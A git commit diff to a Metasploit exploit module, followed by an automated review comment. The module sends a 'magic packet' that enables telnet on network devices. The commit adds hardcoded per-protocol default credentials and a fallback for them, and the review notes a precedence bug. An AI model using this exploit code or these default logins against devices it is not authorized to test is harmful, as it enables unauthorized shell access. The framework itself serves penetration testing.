Use default creds specific to protocol

GSoC/Meterpreter_Web_Console
William Vu 2018-03-02 06:20:21 -06:00
parent 1f40afea9c
commit fba30d47a2
1 changed files with 26 additions and 11 deletions


@ -39,9 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
} }
}, },
'Targets' => [ 'Targets' => [
['Automatic (detect TCP or UDP)', proto: :auto], ['Automatic (detect TCP or UDP)',
['TCP (typically older devices)', proto: :tcp], proto: :auto
['UDP (typically newer devices)', proto: :udp] ],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) ))
@ -49,13 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([ register_options([
Opt::RPORT(23), Opt::RPORT(23),
OptString.new('MAC', [true, 'MAC address of device']), OptString.new('MAC', [true, 'MAC address of device']),
OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']), OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [true, 'Password on device', 'Geardog']) OptString.new('PASSWORD', [false, 'Password on device'])
]) ])
end end
def exploit def exploit
@proto = target[:proto] @proto = target[:proto]
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]
# Detect TCP or UDP # Detect TCP or UDP
if @proto == :auto if @proto == :auto
@ -71,6 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
# Try to use default creds
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end
# Shell it # Shell it
exploit_telnetenabled exploit_telnetenabled
connect_telnetd connect_telnetd
@ -79,11 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit_telnetenabled def exploit_telnetenabled
# Generate the magic packet # Generate the magic packet
print_status('Generating magic packet') print_status('Generating magic packet')
payload = magic_packet( payload = magic_packet(datastore['MAC'], @username, @password)
datastore['MAC'],
datastore['USERNAME'],
datastore['PASSWORD']
)
# Send the magic packet via TCP or UDP # Send the magic packet via TCP or UDP
begin begin
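Review bot: In the `# Try to use default creds` block of `exploit`, a run that sets only one of USERNAME or PASSWORD has both replaced by the target defaults, because `unless @username && @password` overwrites the pair together and the operator's explicit value is dropped silently. Filling each one independently, `@username ||= tgt[:username]` and `@password ||= tgt[:password]`, keeps whatever was set. The lookup `targets.find { |t| t[:proto] == @proto }` is also used unchecked: if the detection code (outside these hunks) can leave `@proto` as `:auto`, it matches the Automatic entry, which carries no credentials, so `nil` would reach `magic_packet`. A guard before the "Shell it" step that fails with a clear message when either value is still `nil` would cover that case. Since both options are now optional, a short comment above the first assignment, e.g. `# Datastore values win; per-protocol target defaults are the fallback`, would document the precedence.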